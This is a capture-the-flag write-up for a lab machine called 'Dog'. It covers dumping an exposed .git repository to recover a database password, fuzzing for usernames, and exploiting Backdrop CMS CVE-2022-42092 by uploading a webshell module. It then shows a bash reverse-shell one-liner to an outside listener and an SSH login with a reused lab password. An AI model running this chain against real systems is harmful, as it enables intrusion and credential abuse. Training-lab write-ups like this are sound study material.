Dog

Overview

Dog is an easy-difficulty Linux box running Backdrop CMS behind Apache. The web root is served straight from a Git working copy, so the entire .git directory is downloadable — dumping it reveals the database credentials hard-coded in settings.php. That password has been reused for a CMS administrator account, and Backdrop 1.27.1’s manual module installer accepts an archive containing arbitrary PHP (CVE-2022-42092), giving code execution as www-data. The same password is reused yet again for a local user, providing a stable SSH session and the user flag. This post covers recon through user.

Machine Matrix

Enumeration plus CVE: exposed .git leaks DB password, a username oracle fuzz, then Backdrop CVE-2022-42092 module-upload RCE and triple password reuse — realistic chain.

Recon

Port	Service	Notes
22/tcp	OpenSSH 8.2p1	Ubuntu 20.04
80/tcp	Apache httpd 2.4.41	Backdrop CMS, exposed .git

nmap -Pn -p- --min-rate=1000 -T4 10.10.11.58
nmap -Pn -p22,80 -sC -sV 10.10.11.58

Two key findings from the script scan: the http-generator header identifies Backdrop CMS, and http-git reports a Git repository found at /.git/ with the last commit message todo: customize url aliases. Add the host:

echo "10.10.11.58 dog.htb" | sudo tee -a /etc/hosts

Enumeration

An exposed .git directory means the whole source tree is recoverable. Dump it with git-dumper:

git-dumper http://dog.htb/ dump
cd dump && git restore .

settings.php carries the live database connection string:

$database = 'mysql://root:[email protected]/backdrop';

MySQL isn’t exposed, so this is only useful if the password is reused. We need a username. Backdrop’s login form rate-limits and blocks, but the URL-alias endpoint ?q=accounts/<name> returns 403 for accounts that exist — a clean username oracle to fuzz:

ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
  -u 'http://dog.htb/?q=accounts/FUZZ' -mc 403 -c

This surfaces two users, john and tiffany. The MySQL password works for tiffany, logging straight into the Backdrop admin dashboard.

Foothold

Confirm the CMS version from the profile info file:

curl -s http://dog.htb/core/profiles/testing/testing.info
# version = 1.27.1

Backdrop CMS 1.27.1 is vulnerable to an authenticated remote command execution via malicious module upload — CVE-2022-42092. The Exploit-DB PoC crafts a module archive containing a PHP webshell. The install endpoint must be reached through the URL-alias form (?q=admin/modules/install), the same trick used for username enumeration.

The web server reports the Zip PHP extension is missing, but the Manual installation page accepts tar, tgz, tar.gz, and tar.bz2. Generate the payload and repackage it as a gzip tarball:

python3 exploit.py http://dog.htb
tar -czvf shell.tar.gz shell

Upload shell.tar.gz via Manual installation → Upload a module, theme, or layout archive. On success the shell lands at /modules/shell/shell.php:

curl -s "http://dog.htb/modules/shell/shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data)

Catch a reverse shell:

nc -lvnp 1337

curl -s "http://dog.htb/modules/shell/shell.php" \
  --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.8/1337 0>&1"'

Then stabilise the TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'
# export TERM=xterm ; Ctrl-Z ; stty raw -echo; fg

User flag

/etc/passwd shows a real interactive account:

grep bash /etc/passwd
# johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash

The database password is reused once more — this time as johncusack’s Linux login. Drop the fragile webshell for a clean SSH session:

sshpass -p 'BackDropJ2024DS2024' ssh [email protected]

The user flag lives at /home/johncusack/user.txt:

cat /home/johncusack/user.txt
# [redacted]

Privilege escalation (sudo on the bee Backdrop CLI, whose eval runs PHP as root) is left as an exercise — this post stops at user.

Find more on Patreon